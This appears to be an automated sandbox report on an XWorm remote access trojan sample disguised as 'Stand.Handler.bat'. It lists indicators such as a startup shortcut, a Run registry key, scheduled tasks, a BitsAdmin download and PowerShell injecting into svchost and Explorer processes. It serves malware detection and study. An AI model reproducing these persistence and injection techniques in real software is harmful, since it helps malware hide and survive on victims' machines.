Malware Analysis Report

2024-11-16 13:42

Sample ID 240531-zdasnacd8v
Target Stand.Handler.bat
SHA256 152c7242abce7287170a4025def239d75c3c294e0710f7073f6bbb25abc31c44
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

152c7242abce7287170a4025def239d75c3c294e0710f7073f6bbb25abc31c44

Threat Level: Known bad

The file Stand.Handler.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Download via BitsAdmin

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 20:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 20:35

Reported

2024-05-31 20:36

Platform

win11-20240426-en

Max time kernel

50s

Max time network

62s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Stand C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 240 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 240 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 240 wrote to memory of 3736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 240 wrote to memory of 3736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 1788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 1788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 4144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3736 wrote to memory of 4144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4144 wrote to memory of 3200 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3200 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3200 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2116 wrote to memory of 3288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2116 wrote to memory of 1176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 3184 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 3492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 2092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 3448 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 4468 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1468 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 1452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1052 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 2428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2016 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 2192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
